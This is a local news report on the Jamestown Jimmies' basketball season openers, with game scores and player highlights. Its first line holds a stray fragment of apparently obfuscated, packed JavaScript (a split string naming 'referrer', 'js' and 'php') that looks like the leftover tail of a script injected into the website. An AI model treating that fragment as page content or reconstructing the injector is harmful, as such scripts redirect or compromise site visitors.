JAMESTOWN sinih|var|u0026u|referrer|arern||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – The Jimmie basketball teams opened up their seasons at the Jamestown Civic Center and each came away with victories. The women battled with Rocky Mountain College to win 67-64. The Jamestown men had little trouble with Crossroads College rolling to a 92-57 win.
The No. 6 Jimmies got everything they could handle from the Battlin’ Bears who came in with a veteran roster and lead for the better part of three quarters. Jimmies trailed by five midway through the third, but Jessica Buck scored four quick ones to pull Jamestown within one. She also went over 1000 points in her career in that stretch.
Jamestown grabbed the lead moments later and didn’t give it back. They survived 20 turnovers, but held off Rocky down the stretch to secure win number one.
The men’s team got a 19-point and 10-rebound performance from KeWan Davis who picked up right where he left off in last years conference championship game. He opened the game with a pair of rim rattling dunks.
The win is the first for new head coach Danny Neville.
Doubleheader Saturday at the Civic Center; women at 4pm against University of Manitoba and the men at 6pm against national runner-up Dakota Wesleyan.
